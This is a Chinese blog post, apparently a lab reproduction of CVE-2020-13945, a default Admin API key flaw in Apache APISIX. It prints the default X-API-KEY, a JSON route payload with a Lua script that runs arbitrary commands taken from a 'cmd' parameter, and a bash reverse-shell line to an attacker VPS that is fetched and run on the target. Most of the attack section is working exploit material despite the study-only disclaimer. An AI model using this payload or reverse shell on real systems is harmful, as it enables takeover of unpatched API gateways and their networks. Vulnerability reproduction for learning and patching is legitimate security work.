Apache apisix默认密钥漏洞（CVE-2020-13945）

系统管理员 2023-10-08 19:33 2阅读 0赞

#### 目录 ####

*  漏洞描述
 *  影响版本
 *  漏洞复现

**声明：本文仅供学习参考，其中涉及的一切资源均来源于网络，请勿用于任何非法行为，否则您将自行承担相应后果，本人不承担任何法律及连带责任。**

## 漏洞描述 ##

Apache APISIX 是一个动态、实时、高性能的 API 网关，基于 Nginx 网络库和 etcd 实现， 提供负载均衡、动态上游、灰度发布、服务熔断、身份认证、可观测性等丰富的流量管理功能。当使用者开启了Admin API，没有配置相应的IP访问策略，且没有修改配置文件Token的情况下，则攻击者利用Apache APISIX的默认Token即可访问Apache APISIX，从而控制APISIX网关。

## 影响版本 ##

Apache APISIX 1.2

Apache APISIX 1.3

Apache APISIX 1.4

Apache APISIX 1.5

## 漏洞复现 ##

该漏洞环境搭建，依然通过vulhub，不再赘述。

![在这里插入图片描述][36db3bd1f76a4cacb2ec716f2009d151.png]  
访问一下http://192.168.10.171:9080/apisix/admin/routes，说明开启了/apisix/admin/routes

![在这里插入图片描述][3f039e6813a740ab8ff5d5d0daeab8b0.png]  
抓取该报文，做如下修改

1、请求方法改为POST

2、加上参数X-API-KEY: edd1c9f034335f136f87ad84b625c8f1

3、加上payload

{
        
        "uri": "/attack",
    "script": "local _M = {} \n function _M.access(conf, ctx) \n local os = require('os')\n local args = assert(ngx.req.get_uri_args()) \n local f = assert(io.popen(args.cmd, 'r'))\n local s = assert(f:read('*a'))\n ngx.say(s)\n f:close()  \n end \nreturn _M",
        "upstream": {
        
            "type": "roundrobin",
            "nodes": {
        
                "example.com:80": 1
            }
        }
    }

![在这里插入图片描述][819146e22e624eb194c043f1d32c5cbe.png]  
然后，访问刚才添加的router，并通过cmd参数执行任意命令

![在这里插入图片描述][6b4d6551e7f94b8e9015a6e98a02fd8e.png]  
接下来，我们来演示将内网的这台服务器，反向连接到VPS上

首先，VPS上编写反弹shell脚本 bash -i >& /dev/tcp/VPS\_IP/VPS\_PORT 0>&1，然后在使用python起一个http服务：python3 -m http.server

![在这里插入图片描述][77bf5341ea664eb19b2006e579bb441a.png]  
下载test.sh脚本文件

![在这里插入图片描述][bfc34c502b4d4c079b512f3c8e24328d.png]  
接下来，执行test.sh脚本文件

![在这里插入图片描述][41b3a0c816c54729831ab763f93050cf.png]

VPS上查看反弹结果

![在这里插入图片描述][c3fc8ccaf7b94023a56656c4683cb7dd.png]

[36db3bd1f76a4cacb2ec716f2009d151.png]: https://img-blog.csdnimg.cn/36db3bd1f76a4cacb2ec716f2009d151.png
[3f039e6813a740ab8ff5d5d0daeab8b0.png]: https://img-blog.csdnimg.cn/3f039e6813a740ab8ff5d5d0daeab8b0.png
[819146e22e624eb194c043f1d32c5cbe.png]: https://img-blog.csdnimg.cn/819146e22e624eb194c043f1d32c5cbe.png
[6b4d6551e7f94b8e9015a6e98a02fd8e.png]: https://img-blog.csdnimg.cn/6b4d6551e7f94b8e9015a6e98a02fd8e.png
[77bf5341ea664eb19b2006e579bb441a.png]: https://img-blog.csdnimg.cn/77bf5341ea664eb19b2006e579bb441a.png
[bfc34c502b4d4c079b512f3c8e24328d.png]: https://img-blog.csdnimg.cn/bfc34c502b4d4c079b512f3c8e24328d.png
[41b3a0c816c54729831ab763f93050cf.png]: https://img-blog.csdnimg.cn/41b3a0c816c54729831ab763f93050cf.png
[c3fc8ccaf7b94023a56656c4683cb7dd.png]: https://img-blog.csdnimg.cn/c3fc8ccaf7b94023a56656c4683cb7dd.png